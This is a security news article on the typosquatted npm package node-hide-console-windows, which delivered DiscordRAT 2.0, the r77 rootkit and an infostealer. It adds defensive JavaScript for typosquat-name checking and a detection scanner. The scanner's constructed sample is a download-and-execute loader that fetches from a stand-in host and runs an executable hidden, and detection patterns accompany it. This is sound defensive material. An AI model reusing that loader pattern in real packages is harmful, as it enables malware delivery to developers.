A new deceptive package has been discovered hidden in the npm package registry that deploys an open source rootkit called r77, marking the first time a rogue npm package has been observed delivering rootkit functionality.
The package in question is node-hide-console-windows, which mimics the legitimate npm package node-hide-console-window; a single trailing "s" separates the two names, a textbook example of typosquatting. It was downloaded 704 times in the two months before it was removed.
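The one-character difference above is exactly what a pre-install name check should catch. The following is an added example, not code from the article or from ReversingLabs: it flags dependency names that sit within a small edit distance of an allow-listed name (the allow-list and the sample manifest are constructed for illustration; a real deployment would load approved names from an internal registry).

```javascript
// Added example (not from the original article): flag npm package names that
// sit within a small edit distance of a known-good name, the way
// "node-hide-console-windows" shadows "node-hide-console-window".
// KNOWN_GOOD is a constructed allow-list for the demonstration.
const KNOWN_GOOD = [
  'node-hide-console-window',
  'express',
  'lodash',
];

// Damerau-Levenshtein distance (optimal string alignment variant): counts
// insertions, deletions, substitutions and adjacent transpositions, so a
// swapped pair of letters ("lodahs") costs 1, not 2.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, () => new Array(b.length + 1).fill(0));
  for (let i = 0; i <= a.length; i++) d[i][0] = i;
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
      }
    }
  }
  return d[a.length][b.length];
}

// Strip separators so "nodehideconsolewindow" and "node_hide_console_window"
// also collide with the hyphenated original.
function normalize(name) {
  return name.toLowerCase().replace(/[-_.]/g, '');
}

// Returns { suspicious, closest, distance } for a candidate package name.
// A name is suspicious when it is not itself on the allow-list but is within
// `maxDistance` edits of one after separator normalisation.
function checkTyposquat(candidate, knownGood = KNOWN_GOOD, maxDistance = 2) {
  if (knownGood.includes(candidate)) return { suspicious: false, closest: candidate, distance: 0 };
  let best = null;
  for (const good of knownGood) {
    const distance = editDistance(normalize(candidate), normalize(good));
    if (best === null || distance < best.distance) best = { closest: good, distance };
  }
  return { suspicious: best !== null && best.distance <= maxDistance, ...best };
}

// Vet every dependency name in a package.json object before `npm install`.
function vetDependencies(pkgJson, knownGood = KNOWN_GOOD) {
  const deps = { ...(pkgJson.dependencies || {}), ...(pkgJson.devDependencies || {}) };
  return Object.keys(deps)
    .map((name) => ({ name, ...checkTyposquat(name, knownGood) }))
    .filter((r) => r.suspicious);
}

// Constructed sample manifest: one real name and one typosquat of it.
const SAMPLE_MANIFEST = {
  dependencies: { 'node-hide-console-windows': '^1.0.0', express: '^4.18.0' },
};

console.log(vetDependencies(SAMPLE_MANIFEST));
```

Run it with `node` and the typosquatted name is reported with its closest legitimate neighbour at distance 1, while the genuine `express` passes. Keep `maxDistance` small: at 2 the check already catches pluralisation, dropped hyphens and swapped letters, and raising it further mostly produces noise between unrelated short names.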
ReversingLabs, which first detected the activity in August 2023, said the package “downloaded a Discord bot that facilitated the installation of an open source rootkit, r77,” adding that it “suggests that open source projects can increasingly be seen as a way for malware to be distributed.”
The malicious code, according to the software supply chain security company, is contained in the package’s index.js file, which, upon execution, retrieves an executable that then runs automatically.
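A fetch-then-launch entry point like the one described above leaves string-level traces that are cheap to check before installing. The following is an added example, not code from the article, from ReversingLabs, or from the malicious package: a heuristic scan over a package's manifest and entry-point source that flags the download-and-execute pattern. The sample index.js and manifest are constructed for the demonstration and are not the real package's code.

```javascript
// Added example (not from the original article or the package): heuristic
// pre-install scan for the download-and-execute pattern. It is a plain
// string-level check, so obfuscated or encoded payloads will evade it;
// treat a clean result as "nothing obvious", not as "safe".

// Each rule is an id plus a regex; hits are reported with their line number.
const RULES = [
  { id: 'child-process', re: /require\(\s*['"]child_process['"]\s*\)|\b(?:exec|execSync|spawn|spawnSync|execFile)\s*\(/ },
  { id: 'remote-fetch',  re: /\b(?:https?\.get|fetch|axios\.get|request)\s*\(\s*['"`]https?:\/\//i },
  { id: 'write-binary',  re: /(?:writeFile(?:Sync)?|createWriteStream)\s*\([^)]*\.(?:exe|dll|bat|ps1|scr)['"`]/i },
  { id: 'hidden-window', re: /windowsHide\s*:\s*true/ },
];

// Scan one file's source text. Returns [{ id, line, text }].
function scanSource(source) {
  const findings = [];
  source.split('\n').forEach((text, idx) => {
    for (const rule of RULES) {
      if (rule.re.test(text)) findings.push({ id: rule.id, line: idx + 1, text: text.trim() });
    }
  });
  return findings;
}

// Lifecycle hooks run automatically on `npm install`, so their presence in
// package.json deserves a look before the entry point is even read.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

function scanManifest(pkgJson) {
  const scripts = pkgJson.scripts || {};
  return LIFECYCLE_HOOKS.filter((h) => h in scripts).map((h) => ({ hook: h, command: scripts[h] }));
}

// A package is flagged when it has an install-time hook AND its source shows
// a remote fetch combined with a process launch, or writes a native
// executable to disk.
function assessPackage(pkgJson, entrySource) {
  const hooks = scanManifest(pkgJson);
  const findings = scanSource(entrySource);
  const ids = new Set(findings.map((f) => f.id));
  const downloadAndExecute =
    (ids.has('remote-fetch') && ids.has('child-process')) || ids.has('write-binary');
  return { flagged: hooks.length > 0 && downloadAndExecute, hooks, findings };
}

// Constructed sample (not the real package's code): an entry point that
// pulls a Windows binary from an assumed URL and launches it hidden.
const SAMPLE_MANIFEST = { name: 'example-typosquat', scripts: { postinstall: 'node index.js' } };
const SAMPLE_INDEX_JS = [
  "const https = require('https');",
  "const fs = require('fs');",
  "const { spawn } = require('child_process');",
  "https.get('https://example.invalid/payload', (res) => {",
  "  const out = fs.createWriteStream('update.exe');",
  "  res.pipe(out).on('finish', () => spawn('update.exe', [], { windowsHide: true }));",
  '});',
].join('\n');

console.log(JSON.stringify(assessPackage(SAMPLE_MANIFEST, SAMPLE_INDEX_JS), null, 2));
```

Against the constructed sample the scan reports the `postinstall` hook plus five findings (the child_process import, the remote fetch, the `.exe` write, the `spawn` call and the `windowsHide` option) and flags the package. The rule list is deliberately short; in practice you would also look for base64 or `eval` wrappers, since that is the first thing an author does once plain regexes start catching the payload.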
The executable in question is an open source C#-based trojan known as DiscordRAT 2.0, which lets an operator remotely control a victim’s host through Discord using over 40 commands that make it easy to collect sensitive data and disable security software.
One of those commands is “!rootkit”, which launches the r77 rootkit on the compromised system. r77, actively maintained by bytecode77, is a “fileless ring 3 rootkit” designed to hide files and processes; it runs in user mode rather than as a kernel driver, and can be bundled with other software or started directly.
This is far from the first time r77 has been used in malicious campaigns in the wild, with threat actors using it as part of attack chains distributing the SeroXen Trojan and cryptocurrency miners.
What’s more, two different versions of node-hide-console-windows have been found to fetch an open source information stealer called Blank-Grabber alongside DiscordRAT 2.0, passing it off as a “visual code update.”
A notable aspect of the campaign is that it is built entirely on components that are freely and publicly available online, requiring little effort on the part of threat actors to put it all together and opening the software supply chain attack door to low-skilled actors.
The research findings underscore the need for caution among developers when installing packages from open source repositories. Earlier this week, Fortinet FortiGuard Labs identified nearly three dozen modules with variations in coding style and execution methods that came equipped with data collection capabilities.
“The malicious actor or actors made an effort to make their packages appear trustworthy,” said security researcher Lucija Valentić.
“The actor or actors behind this campaign created an npm page that closely resembled the page of the legitimate package that was being manipulated with typos, and even created 10 versions of the malicious package to mirror the package they were imitating.”